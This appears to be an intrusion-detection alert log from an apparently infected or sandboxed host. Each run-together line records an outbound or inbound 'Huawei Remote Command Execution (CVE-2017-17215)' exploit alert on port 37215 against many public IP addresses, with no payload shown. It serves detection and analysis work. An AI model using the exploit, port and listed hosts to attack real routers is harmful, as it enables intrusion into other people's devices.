                                                    07/10/24-08:27:08.431901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3343037215192.168.2.1449.139.108.148
                                                    07/10/24-08:27:31.543266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556037215192.168.2.14157.199.20.102
                                                    07/10/24-08:26:41.429574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615637215192.168.2.14157.60.98.102
                                                    07/10/24-08:27:24.941160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4712237215192.168.2.14197.183.233.137
                                                    07/10/24-08:27:31.439490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759837215192.168.2.14197.79.85.119
                                                    07/10/24-08:26:47.851714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228837215192.168.2.14197.213.168.102
                                                    07/10/24-08:27:30.433445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988837215192.168.2.14157.137.140.113
                                                    07/10/24-08:27:27.058736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079837215192.168.2.14197.153.237.195
                                                    07/10/24-08:26:33.262115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116437215192.168.2.1498.129.167.80
                                                    07/10/24-08:26:14.813638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992637215192.168.2.14157.187.226.72
                                                    07/10/24-08:27:05.223403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713237215192.168.2.1441.46.198.74
                                                    07/10/24-08:27:23.928325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906237215192.168.2.14182.237.205.221
                                                    07/10/24-08:27:33.743340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733837215192.168.2.14202.99.56.91
                                                    07/10/24-08:26:38.592114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5942237215192.168.2.14157.34.145.234
                                                    07/10/24-08:26:45.636765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543037215192.168.2.14151.68.226.146
                                                    07/10/24-08:26:49.761554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315837215192.168.2.1457.196.252.179
                                                    07/10/24-08:27:14.894597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654437215192.168.2.1481.48.141.181
                                                    07/10/24-08:26:33.151906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008037215192.168.2.1441.185.116.179
                                                    07/10/24-08:27:28.146093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645637215192.168.2.1441.168.46.235
                                                    07/10/24-08:27:30.456446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428237215192.168.2.1441.114.136.227
                                                    07/10/24-08:26:52.013452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672637215192.168.2.14168.196.46.247
                                                    07/10/24-08:27:03.001228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845037215192.168.2.1441.80.70.24
                                                    07/10/24-08:26:59.847925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433437215192.168.2.1448.11.87.246
                                                    07/10/24-08:27:22.877679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762237215192.168.2.14113.185.175.46
                                                    07/10/24-08:27:28.045782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256237215192.168.2.14157.250.244.5
                                                    07/10/24-08:27:23.792966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5987637215192.168.2.1441.200.72.109
                                                    07/10/24-08:26:38.594738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157837215192.168.2.1441.197.29.140
                                                    07/10/24-08:26:42.180724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856037215192.168.2.14197.151.197.29
                                                    07/10/24-08:26:43.748441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719837215192.168.2.1475.64.105.131
                                                    07/10/24-08:27:27.126128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826437215192.168.2.14157.140.108.240
                                                    07/10/24-08:27:11.526657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207437215192.168.2.14180.4.124.132
                                                    07/10/24-08:26:57.551648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5610037215192.168.2.14184.83.107.202
                                                    07/10/24-08:27:20.481124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876037215192.168.2.14157.34.42.163
                                                    07/10/24-08:27:23.937541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526437215192.168.2.1441.202.45.195
                                                    07/10/24-08:26:29.761571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130837215192.168.2.14197.141.58.61
                                                    07/10/24-08:26:55.359500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221437215192.168.2.14157.115.10.199
                                                    07/10/24-08:27:10.558615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512837215192.168.2.1441.187.189.133
                                                    07/10/24-08:26:41.419620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919637215192.168.2.14197.153.244.134
                                                    07/10/24-08:27:30.518988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501037215192.168.2.14133.127.64.48
                                                    07/10/24-08:27:33.823408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551037215192.168.2.14197.147.80.45
                                                    07/10/24-08:27:33.915433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420437215192.168.2.1441.244.49.63
                                                    07/10/24-08:26:13.652301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054037215192.168.2.1441.42.255.166
                                                    07/10/24-08:26:53.247062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621237215192.168.2.14157.196.29.109
                                                    07/10/24-08:26:45.663934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190837215192.168.2.1441.67.254.102
                                                    07/10/24-08:26:22.227623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777437215192.168.2.1441.166.76.249
                                                    07/10/24-08:27:02.709271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867637215192.168.2.14156.79.68.13
                                                    07/10/24-08:26:26.564107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196837215192.168.2.1441.192.49.90
                                                    07/10/24-08:26:51.994858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664637215192.168.2.14197.129.57.161
                                                    07/10/24-08:26:25.502645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099437215192.168.2.14217.188.221.83
                                                    07/10/24-08:26:28.914881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892037215192.168.2.14176.196.25.237
                                                    07/10/24-08:26:38.576463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378837215192.168.2.14197.23.118.46
                                                    07/10/24-08:26:13.776701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672437215192.168.2.1441.111.125.2
                                                    07/10/24-08:27:24.970064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056237215192.168.2.14157.49.130.88
                                                    07/10/24-08:26:14.811511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298837215192.168.2.14157.19.87.48
                                                    07/10/24-08:26:38.529678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643037215192.168.2.14197.27.35.86
                                                    07/10/24-08:27:13.750468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367037215192.168.2.14197.203.21.140
                                                    07/10/24-08:26:55.400529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467237215192.168.2.14157.187.75.213
                                                    07/10/24-08:27:31.522648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165037215192.168.2.14194.86.237.113
                                                    07/10/24-08:26:43.825233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415437215192.168.2.14197.86.91.195
                                                    07/10/24-08:26:22.275935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605037215192.168.2.14197.180.3.109
                                                    07/10/24-08:27:36.290826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5548237215192.168.2.1494.221.214.215
                                                    07/10/24-08:27:10.554051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3661637215192.168.2.14157.116.55.253
                                                    07/10/24-08:26:48.005447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371237215192.168.2.14197.181.37.65
                                                    07/10/24-08:27:14.844780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351837215192.168.2.1441.252.194.226
                                                    07/10/24-08:27:34.127270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702437215192.168.2.1427.135.208.242
                                                    07/10/24-08:26:29.856939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355037215192.168.2.14157.163.140.43
                                                    07/10/24-08:26:49.897111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3415437215192.168.2.14161.41.215.47
                                                    07/10/24-08:27:30.527046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370837215192.168.2.1441.105.152.235
                                                    07/10/24-08:26:38.544171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132637215192.168.2.14197.231.58.78
                                                    07/10/24-08:26:25.514103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262237215192.168.2.14197.25.73.251
                                                    07/10/24-08:26:31.040433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138437215192.168.2.14158.65.101.169
                                                    07/10/24-08:27:30.514839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617437215192.168.2.1441.186.151.41
                                                    07/10/24-08:26:55.354961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362637215192.168.2.14157.113.225.174
                                                    07/10/24-08:26:25.493700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643837215192.168.2.14180.48.61.3
                                                    07/10/24-08:26:33.268037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397437215192.168.2.14157.34.132.63
                                                    07/10/24-08:26:59.780112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3973037215192.168.2.1441.126.51.139
                                                    07/10/24-08:27:28.181617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582637215192.168.2.14157.66.152.255
                                                    07/10/24-08:27:17.050369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580837215192.168.2.14157.232.241.92
                                                    07/10/24-08:26:29.885713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3328037215192.168.2.14138.234.234.79
                                                    07/10/24-08:27:07.384495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806437215192.168.2.1441.22.197.157
                                                    07/10/24-08:26:59.801694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690037215192.168.2.1477.249.249.93
                                                    07/10/24-08:27:22.794160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523237215192.168.2.14197.185.253.207
                                                    07/10/24-08:26:15.840118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495437215192.168.2.14126.171.171.250
                                                    07/10/24-08:26:47.983815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415037215192.168.2.1441.89.180.191
                                                    07/10/24-08:27:22.460068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943637215192.168.2.1441.99.113.129
                                                    07/10/24-08:26:28.882504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708237215192.168.2.14157.94.172.30
                                                    07/10/24-08:27:05.190892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596237215192.168.2.1441.152.212.159
                                                    07/10/24-08:26:26.564654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985037215192.168.2.14197.19.34.87
                                                    07/10/24-08:27:13.863039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028637215192.168.2.14157.180.51.70
                                                    07/10/24-08:26:26.573174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327237215192.168.2.14157.228.127.2
                                                    07/10/24-08:26:28.641864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505437215192.168.2.14197.160.238.171
                                                    07/10/24-08:27:13.961698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776837215192.168.2.1441.98.10.12
                                                    07/10/24-08:26:49.811589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860637215192.168.2.14197.173.68.128
                                                    07/10/24-08:26:43.582733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133437215192.168.2.14157.6.21.117
                                                    07/10/24-08:27:11.489140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356237215192.168.2.1441.190.177.41
                                                    07/10/24-08:27:30.423950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658037215192.168.2.14157.25.10.75
                                                    07/10/24-08:26:28.732264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727037215192.168.2.1441.181.168.143
                                                    07/10/24-08:26:13.655669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262237215192.168.2.14211.46.225.222
                                                    07/10/24-08:26:33.251804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174237215192.168.2.14157.224.217.244
                                                    07/10/24-08:27:10.617343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740037215192.168.2.14201.101.70.32
                                                    07/10/24-08:26:43.857526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177437215192.168.2.1441.252.131.195
                                                    07/10/24-08:26:43.613127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582437215192.168.2.14157.21.199.57
                                                    07/10/24-08:26:55.392716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832837215192.168.2.14197.138.73.22
                                                    07/10/24-08:27:13.976199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915437215192.168.2.14152.120.141.42
                                                    07/10/24-08:26:25.453696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395837215192.168.2.14197.110.46.115
                                                    07/10/24-08:27:32.538394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3980037215192.168.2.14157.208.173.231
                                                    07/10/24-08:26:47.976688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814437215192.168.2.1450.4.216.26
                                                    07/10/24-08:26:36.351608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903837215192.168.2.14199.32.165.4
                                                    07/10/24-08:26:15.788826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781037215192.168.2.14180.87.170.50
                                                    07/10/24-08:26:25.499422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209037215192.168.2.1442.91.116.109
                                                    07/10/24-08:26:29.781347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223237215192.168.2.1441.39.91.118
                                                    07/10/24-08:26:36.366891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4218037215192.168.2.14197.202.241.54
                                                    07/10/24-08:26:57.551648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.1441.94.163.136
                                                    07/10/24-08:27:13.837661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963437215192.168.2.14157.125.213.45
                                                    07/10/24-08:26:29.847797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102037215192.168.2.14197.252.90.189
                                                    07/10/24-08:26:36.372114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518437215192.168.2.14157.31.49.26
                                                    07/10/24-08:27:33.681754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644437215192.168.2.1441.152.159.245
                                                    07/10/24-08:27:32.577578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018437215192.168.2.14160.46.16.108
                                                    07/10/24-08:26:57.654674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292437215192.168.2.1441.40.80.54
                                                    07/10/24-08:27:32.609585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001837215192.168.2.1441.208.184.86
                                                    07/10/24-08:26:26.597070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233637215192.168.2.14197.239.253.179
                                                    07/10/24-08:26:47.871507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941837215192.168.2.14197.135.164.55
                                                    07/10/24-08:26:28.842346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005237215192.168.2.14197.184.166.119
                                                    07/10/24-08:26:29.842425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4326037215192.168.2.14197.56.106.65
                                                    07/10/24-08:26:42.375701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882637215192.168.2.1441.3.125.185
                                                    07/10/24-08:26:29.874680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445037215192.168.2.14157.149.23.2
                                                    07/10/24-08:27:17.054152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974437215192.168.2.1441.102.190.42
                                                    07/10/24-08:26:25.460773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449437215192.168.2.1435.39.127.140
                                                    07/10/24-08:26:59.768994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572037215192.168.2.1434.105.143.158
                                                    07/10/24-08:26:22.283618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230637215192.168.2.14157.228.98.102
                                                    07/10/24-08:27:27.051351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834437215192.168.2.14157.165.217.65
                                                    07/10/24-08:26:59.724470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719637215192.168.2.1441.182.170.176
                                                    07/10/24-08:27:02.730026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979037215192.168.2.14197.115.212.222
                                                    07/10/24-08:26:28.855166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473837215192.168.2.1441.82.199.175
                                                    07/10/24-08:26:33.228376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087437215192.168.2.14197.3.225.86
                                                    07/10/24-08:26:15.863790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069837215192.168.2.149.245.242.96
                                                    07/10/24-08:27:07.327851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800037215192.168.2.14157.200.143.109
                                                    07/10/24-08:26:29.790185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567837215192.168.2.14197.194.132.215
                                                    07/10/24-08:26:22.239917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369437215192.168.2.1441.44.18.182
                                                    07/10/24-08:27:05.172192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944437215192.168.2.1441.46.19.222
                                                    07/10/24-08:27:19.311200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857437215192.168.2.14197.171.7.226
                                                    07/10/24-08:26:47.900584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087837215192.168.2.1441.191.166.23
                                                    07/10/24-08:27:33.861277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092837215192.168.2.14157.219.183.247
                                                    07/10/24-08:27:19.298616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321637215192.168.2.1441.159.187.153
                                                    07/10/24-08:26:59.632292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269837215192.168.2.1425.176.141.18
                                                    07/10/24-08:26:13.847797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630437215192.168.2.1477.99.78.105
                                                    07/10/24-08:27:23.866031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724637215192.168.2.14169.11.135.203
                                                    07/10/24-08:27:23.893533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439037215192.168.2.14157.32.132.238
                                                    07/10/24-08:26:13.767767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5465637215192.168.2.1441.95.26.48
                                                    07/10/24-08:27:24.913087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611037215192.168.2.14197.22.206.251
                                                    07/10/24-08:27:33.755153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785037215192.168.2.1440.227.174.4
                                                    07/10/24-08:26:48.009787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4460837215192.168.2.1441.103.221.226
                                                    07/10/24-08:26:29.824818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112037215192.168.2.14157.103.54.18
                                                    07/10/24-08:26:26.602369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071637215192.168.2.14157.104.161.167
                                                    07/10/24-08:26:11.609445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320437215192.168.2.14123.131.134.210
                                                    07/10/24-08:26:42.409731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376837215192.168.2.14157.129.62.150
                                                    07/10/24-08:26:57.675135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557637215192.168.2.1441.237.32.75
                                                    07/10/24-08:27:27.168343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156637215192.168.2.1441.79.131.184
                                                    07/10/24-08:26:18.005995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959837215192.168.2.14157.50.74.82
                                                    07/10/24-08:26:33.263380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524437215192.168.2.14157.69.8.44
                                                    07/10/24-08:26:36.346180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827037215192.168.2.14157.111.246.209
                                                    07/10/24-08:27:07.281548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816237215192.168.2.14157.90.88.183
                                                    07/10/24-08:27:30.482034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085437215192.168.2.14197.9.86.122
                                                    07/10/24-08:27:13.972305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687437215192.168.2.14157.251.173.82
                                                    07/10/24-08:27:13.879681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370237215192.168.2.1441.255.1.82
                                                    07/10/24-08:26:33.248945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122837215192.168.2.1484.214.205.194
                                                    07/10/24-08:26:11.588722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821637215192.168.2.14108.13.36.194
                                                    07/10/24-08:27:23.952903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283437215192.168.2.1441.65.218.72
                                                    07/10/24-08:26:43.857125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019637215192.168.2.1441.145.235.95
                                                    07/10/24-08:26:59.644230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181837215192.168.2.14157.17.80.42
                                                    07/10/24-08:26:47.948537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632637215192.168.2.1441.122.100.253
                                                    07/10/24-08:27:10.595631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704237215192.168.2.1441.39.164.84
                                                    07/10/24-08:26:36.382333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931837215192.168.2.14197.26.73.122
                                                    07/10/24-08:26:15.882242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492837215192.168.2.14197.72.20.53
                                                    07/10/24-08:27:22.472271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158237215192.168.2.14157.154.59.139
                                                    07/10/24-08:26:59.566844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6099037215192.168.2.1481.43.133.104
                                                    07/10/24-08:27:02.811605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763837215192.168.2.14157.229.70.60
                                                    07/10/24-08:26:41.539948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866037215192.168.2.1466.133.245.198
                                                    07/10/24-08:27:10.601201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770037215192.168.2.1441.147.5.102
                                                    07/10/24-08:27:23.773863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952637215192.168.2.1441.198.5.253
                                                    07/10/24-08:27:23.482835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5393837215192.168.2.14157.6.83.192
                                                    07/10/24-08:26:52.043964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313237215192.168.2.1441.16.147.219
                                                    07/10/24-08:27:02.939930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4973037215192.168.2.1441.210.24.34
                                                    07/10/24-08:26:59.541812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739837215192.168.2.14197.101.63.63
                                                    07/10/24-08:26:31.077497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519837215192.168.2.1471.251.133.133
                                                    07/10/24-08:26:43.655825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673037215192.168.2.14157.89.29.87
